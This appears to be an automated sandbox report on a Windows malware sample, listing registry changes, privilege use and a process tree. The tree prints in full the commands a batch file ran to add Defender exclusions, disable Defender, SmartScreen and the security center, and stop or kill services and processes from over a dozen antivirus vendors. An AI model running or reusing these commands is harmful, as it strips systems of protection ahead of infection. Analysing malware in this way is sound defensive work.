\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-308834014-1004923324-1191300197-1000\{F50CF0EC-872C-4B44-B1BC-E54C238A7FA5} msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 6016 reg.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 3 IoCs
pid Process 3516 PING.EXE 6056 PING.EXE 4864 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4276 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 536 powershell.exe 536 powershell.exe 4980 powershell.exe 4980 powershell.exe 4884 powershell.exe 4884 powershell.exe 3396 powershell.exe 3396 powershell.exe 3396 powershell.exe 5508 powershell.exe 5508 powershell.exe 5508 powershell.exe 5816 powershell.exe 5816 powershell.exe 5816 powershell.exe 5388 powershell.exe 5388 powershell.exe 5388 powershell.exe 3488 powershell.exe 3488 powershell.exe 3488 powershell.exe 4464 explorerS.exe 4660 powershell.exe 4660 powershell.exe 4660 powershell.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 4464 explorerS.exe 4464 explorerS.exe 4464 explorerS.exe 1800 explorer.exe 3452 powershell.exe 3452 powershell.exe 3452 powershell.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3452 powershell.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe 3712 dialer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 4164 msedge.exe 4164 msedge.exe 4164 msedge.exe 4164 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeDebugPrivilege 4884 powershell.exe Token: SeDebugPrivilege 3396 powershell.exe Token: SeDebugPrivilege 116 taskkill.exe Token: SeDebugPrivilege 2564 taskkill.exe Token: SeDebugPrivilege 4804 taskkill.exe Token: SeDebugPrivilege 2856 taskkill.exe Token: SeDebugPrivilege 5404 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 6076 taskkill.exe Token: SeDebugPrivilege 5116 taskkill.exe Token: SeDebugPrivilege 1468 taskkill.exe Token: SeDebugPrivilege 2288 taskkill.exe Token: SeDebugPrivilege 5456 taskkill.exe Token: SeDebugPrivilege 2176 taskkill.exe Token: SeDebugPrivilege 5284 taskkill.exe Token: SeDebugPrivilege 5216 taskkill.exe Token: SeDebugPrivilege 2784 taskkill.exe Token: SeDebugPrivilege 3420 taskkill.exe Token: SeDebugPrivilege 5764 taskkill.exe Token: SeDebugPrivilege 1020 taskkill.exe Token: SeDebugPrivilege 4156 taskkill.exe Token: SeDebugPrivilege 3112 taskkill.exe Token: SeDebugPrivilege 5096 taskkill.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeDebugPrivilege 4404 taskkill.exe Token: SeDebugPrivilege 5956 taskkill.exe Token: SeDebugPrivilege 5492 taskkill.exe Token: SeDebugPrivilege 5652 taskkill.exe Token: SeDebugPrivilege 5488 taskkill.exe Token: SeDebugPrivilege 2192 taskkill.exe Token: SeDebugPrivilege 4660 taskkill.exe Token: SeDebugPrivilege 4656 taskkill.exe Token: SeDebugPrivilege 3620 taskkill.exe Token: SeDebugPrivilege 344 taskkill.exe Token: SeDebugPrivilege 2236 taskkill.exe Token: SeDebugPrivilege 5768 taskkill.exe Token: SeDebugPrivilege 4764 taskkill.exe Token: SeDebugPrivilege 4812 taskkill.exe Token: SeDebugPrivilege 1500 taskkill.exe Token: SeDebugPrivilege 3920 taskkill.exe Token: SeDebugPrivilege 5720 taskkill.exe Token: SeDebugPrivilege 5664 taskkill.exe Token: SeDebugPrivilege 5876 taskkill.exe Token: SeDebugPrivilege 4552 taskkill.exe Token: SeDebugPrivilege 3300 taskkill.exe Token: SeDebugPrivilege 2052 taskkill.exe Token: SeLoadDriverPrivilege 5128 fltMC.exe Token: SeLoadDriverPrivilege 5196 fltMC.exe Token: SeLoadDriverPrivilege 320 fltMC.exe Token: SeLoadDriverPrivilege 2872 fltMC.exe Token: SeLoadDriverPrivilege 2324 fltMC.exe Token: SeLoadDriverPrivilege 4500 fltMC.exe Token: SeDebugPrivilege 5508 powershell.exe Token: SeDebugPrivilege 5816 powershell.exe Token: SeDebugPrivilege 5388 powershell.exe Token: SeDebugPrivilege 3528 explorer.exe Token: SeDebugPrivilege 3488 powershell.exe Token: SeDebugPrivilege 5176 Launcher.exe Token: SeDebugPrivilege 4660 powershell.exe Token: SeDebugPrivilege 4464 explorerS.exe Token: SeDebugPrivilege 3712 dialer.exe Token: SeShutdownPrivilege 2072 powercfg.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4164 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5440 Conhost.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3432 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4592 wrote to memory of 6056 4592 cmd.exe 89 PID 4592 wrote to memory of 6056 4592 cmd.exe 89 PID 4592 wrote to memory of 3016 4592 cmd.exe 90 PID 4592 wrote to memory of 3016 4592 cmd.exe 90 PID 3016 wrote to memory of 1412 3016 net.exe 91 PID 3016 wrote to memory of 1412 3016 net.exe 91 PID 4592 wrote to memory of 3516 4592 cmd.exe 92 PID 4592 wrote to memory of 3516 4592 cmd.exe 92 PID 4592 wrote to memory of 536 4592 cmd.exe 96 PID 4592 wrote to memory of 536 4592 cmd.exe 96 PID 4592 wrote to memory of 4980 4592 cmd.exe 97 PID 4592 wrote to memory of 4980 4592 cmd.exe 97 PID 4592 wrote to memory of 4884 4592 cmd.exe 101 PID 4592 wrote to memory of 4884 4592 cmd.exe 101 PID 4592 wrote to memory of 2136 4592 cmd.exe 103 PID 4592 wrote to memory of 2136 4592 cmd.exe 103 PID 4592 wrote to memory of 3396 4592 cmd.exe 104 PID 4592 wrote to memory of 3396 4592 cmd.exe 104 PID 4592 wrote to memory of 1820 4592 cmd.exe 105 PID 4592 wrote to memory of 1820 4592 cmd.exe 105 PID 4592 wrote to memory of 2932 4592 cmd.exe 106 PID 4592 wrote to memory of 2932 4592 cmd.exe 106 PID 4592 wrote to memory of 3564 4592 cmd.exe 107 PID 4592 wrote to memory of 3564 4592 cmd.exe 107 PID 4592 wrote to memory of 2016 4592 cmd.exe 108 PID 4592 wrote to memory of 2016 4592 cmd.exe 108 PID 4592 wrote to memory of 5988 4592 cmd.exe 109 PID 4592 wrote to memory of 5988 4592 cmd.exe 109 PID 4592 wrote to memory of 4184 4592 cmd.exe 110 PID 4592 wrote to memory of 4184 4592 cmd.exe 110 PID 4592 wrote to memory of 2804 4592 cmd.exe 111 PID 4592 wrote to memory of 2804 4592 cmd.exe 111 PID 4592 wrote to memory of 4164 4592 cmd.exe 112 PID 4592 wrote to memory of 4164 4592 cmd.exe 112 PID 4592 wrote to memory of 3776 4592 cmd.exe 113 PID 4592 wrote to memory of 3776 4592 cmd.exe 113 PID 4592 wrote to memory of 1696 4592 cmd.exe 114 PID 4592 wrote to memory of 1696 4592 cmd.exe 114 PID 4592 wrote to memory of 3772 4592 cmd.exe 115 PID 4592 wrote to memory of 3772 4592 cmd.exe 115 PID 4592 wrote to memory of 1384 4592 cmd.exe 116 PID 4592 wrote to memory of 1384 4592 cmd.exe 116 PID 4592 wrote to memory of 4476 4592 cmd.exe 117 PID 4592 wrote to memory of 4476 4592 cmd.exe 117 PID 4592 wrote to memory of 3936 4592 cmd.exe 118 PID 4592 wrote to memory of 3936 4592 cmd.exe 118 PID 4592 wrote to memory of 2284 4592 cmd.exe 119 PID 4592 wrote to memory of 2284 4592 cmd.exe 119 PID 4592 wrote to memory of 116 4592 cmd.exe 120 PID 4592 wrote to memory of 116 4592 cmd.exe 120 PID 4592 wrote to memory of 2564 4592 cmd.exe 121 PID 4592 wrote to memory of 2564 4592 cmd.exe 121 PID 4592 wrote to memory of 4804 4592 cmd.exe 122 PID 4592 wrote to memory of 4804 4592 cmd.exe 122 PID 4592 wrote to memory of 3044 4592 cmd.exe 123 PID 4592 wrote to memory of 3044 4592 cmd.exe 123 PID 4592 wrote to memory of 3956 4592 cmd.exe 124 PID 4592 wrote to memory of 3956 4592 cmd.exe 124 PID 4592 wrote to memory of 2856 4592 cmd.exe 125 PID 4592 wrote to memory of 2856 4592 cmd.exe 125 PID 4592 wrote to memory of 5404 4592 cmd.exe 126 PID 4592 wrote to memory of 5404 4592 cmd.exe 126 PID 4592 wrote to memory of 2460 4592 cmd.exe 127 PID 4592 wrote to memory of 2460 4592 cmd.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 5476 attrib.exe 2136 attrib.exe 2920 attrib.exe 4320 attrib.exe 5796 attrib.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:612
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1056
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1156 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2808
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1492
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2732
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1528
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1832
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1896
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1088
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1008
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2624
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2820
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3328
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\seven.bat"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5908
-
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:6056
-
-
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:1412
-
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath 'C:'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
C:\Windows\system32\attrib.exeattrib +h "Crack" /s /d3⤵
- Views/modifies file attributes
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Crack'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:1820
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f3⤵PID:2932
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v AllowFastServiceStartup /t REG_DWORD /d 0 /f3⤵PID:3564
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2016
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5988
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4184
-
-
C:\Windows\system32\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:2804
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4164
-
-
C:\Windows\system32\sc.exesc stop WdNisSvc3⤵
- Launches sc.exe
PID:3776
-
-
C:\Windows\system32\sc.exesc config WdNisSvc start= disabled3⤵
- Launches sc.exe
PID:1696
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 4 /f3⤵
- Modifies security service
PID:3772
-
-
C:\Windows\system32\sc.exesc stop wscsvc3⤵
- Launches sc.exe
PID:1384
-
-
C:\Windows\system32\sc.exesc config wscsvc start= disabled3⤵
- Launches sc.exe
PID:4476
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f3⤵PID:3936
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f3⤵PID:2284
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM avp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:116
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM avpui.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM klnagent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
C:\Windows\system32\sc.exesc stop kavsvc3⤵
- Launches sc.exe
PID:3044
-
-
C:\Windows\system32\sc.exesc config kavsvc start= disabled3⤵
- Launches sc.exe
PID:3956
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM 360tray.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM 360sd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5404
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM 360rp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\system32\sc.exesc stop 360BaseSvc3⤵
- Launches sc.exe
PID:2980
-
-
C:\Windows\system32\sc.exesc config 360BaseSvc start= disabled3⤵
- Launches sc.exe
PID:904
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM egui.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6076
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM ekrn.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Windows\system32\sc.exesc stop ekrn3⤵
- Launches sc.exe
PID:4320
-
-
C:\Windows\system32\sc.exesc config ekrn start= disabled3⤵
- Launches sc.exe
PID:2212
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM Mcshield.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM McTray.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mfevtps.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5456
-
-
C:\Windows\system32\sc.exesc stop McAfeeFramework3⤵
- Launches sc.exe
PID:3216
-
-
C:\Windows\system32\sc.exesc config McAfeeFramework start= disabled3⤵
- Launches sc.exe
PID:1176
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM avgnt.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM avguard.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5284
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM avshadow.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5216
-
-
C:\Windows\system32\sc.exesc stop Avira.ServiceHost3⤵
- Launches sc.exe
PID:2836
-
-
C:\Windows\system32\sc.exesc config Avira.ServiceHost start= disabled3⤵
- Launches sc.exe
PID:3472
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM dwengine.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM spideragent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM drweb32.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM drwebsc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Windows\system32\sc.exesc stop DrWebEngine3⤵
- Launches sc.exe
PID:1340
-
-
C:\Windows\system32\sc.exesc config DrWebEngine start= disabled3⤵
- Launches sc.exe
PID:5628
-
-
C:\Windows\system32\sc.exesc stop DrWebSpIDer3⤵
- Launches sc.exe
PID:4316
-
-
C:\Windows\system32\sc.exesc config DrWebSpIDer start= disabled3⤵
- Launches sc.exe
PID:412
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdagent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdservicehost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdredline.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
C:\Windows\system32\sc.exesc stop BDProtect3⤵
- Launches sc.exe
PID:1732
-
-
C:\Windows\system32\sc.exesc config BDProtect start= disabled3⤵
- Launches sc.exe
PID:1396
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM avastsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM aswToolsSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM aswEngSrv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5956
-
-
C:\Windows\system32\sc.exesc stop "avast! Antivirus"3⤵
- Launches sc.exe
PID:5568
-
-
C:\Windows\system32\sc.exesc config "avast! Antivirus" start= disabled3⤵
- Launches sc.exe
PID:5504
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM avgwdsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5492
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM avgsvc.exe3⤵
- Kills process with taskkill
PID:6016
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM avgui.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5652
-
-
C:\Windows\system32\sc.exesc stop AVGService3⤵
- Launches sc.exe
PID:5708
-
-
C:\Windows\system32\sc.exesc config AVGService start= disabled3⤵
- Launches sc.exe
PID:3660
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM nortonsecurity.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5488
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM ns.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM navw32.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4660
-
-
C:\Windows\system32\sc.exesc stop NortonSecurity3⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\system32\sc.exesc config NortonSecurity start= disabled3⤵
- Launches sc.exe
PID:6040
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM tmproxy.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM pccntmon.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3620
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM tmlisten.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:344
-
-
C:\Windows\system32\sc.exesc stop TmProxy3⤵
- Launches sc.exe
PID:4600
-
-
C:\Windows\system32\sc.exesc config TmProxy start= disabled3⤵
- Launches sc.exe
PID:2812
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbam.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamservice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5768
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamtray.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Windows\system32\sc.exesc stop MBAMService3⤵
- Launches sc.exe
PID:4908
-
-
C:\Windows\system32\sc.exesc config MBAMService start= disabled3⤵
- Launches sc.exe
PID:4948
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cis.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cfp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cmdagent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
